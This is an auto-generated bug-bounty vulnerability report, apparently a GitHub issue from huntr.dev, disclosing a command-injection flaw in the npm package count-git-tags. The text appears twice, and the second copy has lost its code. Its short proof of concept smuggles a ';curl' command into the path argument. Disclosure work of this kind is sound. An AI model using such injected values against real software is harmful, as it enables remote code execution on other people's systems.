This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/aichbauer/node-count-git-tags/blob/master/index.js#L27
POC
// poc.js
const countGitTags = require('count-git-tags');
countGitTags({ path: '.git;curl "http://localhost/RCE"' });Impact
RCE on count-git-tags via insecure command formatting
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚
Automatically generated by @huntr-helper...
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description
The issue occurs because a
user inputis formatted inside acommandthat will be executed without any check. The issue arises here: https://github.com/aichbauer/node-count-git-tags/blob/master/index.js#L27POC
Impact
RCEoncount-git-tagsviainsecure command formattingBug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚
Automatically generated by @huntr-helper...